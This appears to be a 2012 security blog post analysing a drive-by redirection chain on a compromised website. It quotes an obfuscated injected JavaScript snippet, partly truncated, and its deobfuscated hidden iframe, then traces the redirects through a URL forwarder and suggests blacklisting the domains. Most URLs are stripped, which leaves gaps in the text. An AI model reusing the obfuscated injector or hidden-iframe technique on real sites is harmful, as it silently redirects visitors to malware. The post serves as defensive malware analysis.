Saturday, September 1, 2012

Suspicious Movement in ASN40034 (infector to &

It's beginning from infected hosting homepage of hxxp://
It is a good honest site. Sadly, it's having the suspicious code at 
I downloaded to examine to find the below JS/Code:
<script>el=document.createElement("div");try{a}catch(qq) {el.appendChild(document.createElement("p")); el.appendChild(document.createTextNode("q")); el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el) {appendChild(document.createTextNode("eva"));}} k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44 c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32 c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104 c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76 c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....
↑was easily to deobfuscate to find the below iframer...
<iframe src='hxxp://' width='10' height='10' style= 'visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Which making me checking the hxxp:// to find- the multiple malicious links as per coded below: ↑The above links is obviously for the purpose to make sure users are - redirected to the below HTML file with another JS code: It will lead us to the link of:
What's this? We have many reference about it in the urlquery below: This is actually a url forwarder service used to redirect request to some- other URL for the downloading or etc purpose. I checked to the recorded URL- And found the format of the query like:
hxxp:// \ 7POJ4E717&gkwrf=hxxp://\ Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
hxxp:// 7POYGN0G2&gkwrf=
In our case with the certain ticket (folio=7POYGN0G2) and - domain ( forwarded us to special path in host. Be free to check and analyzed further of what you can get from that host. The interesting part is and are in the - same network : With sharing same IP address with lame malicious domain like:
Blacklisting and will be a nice idea!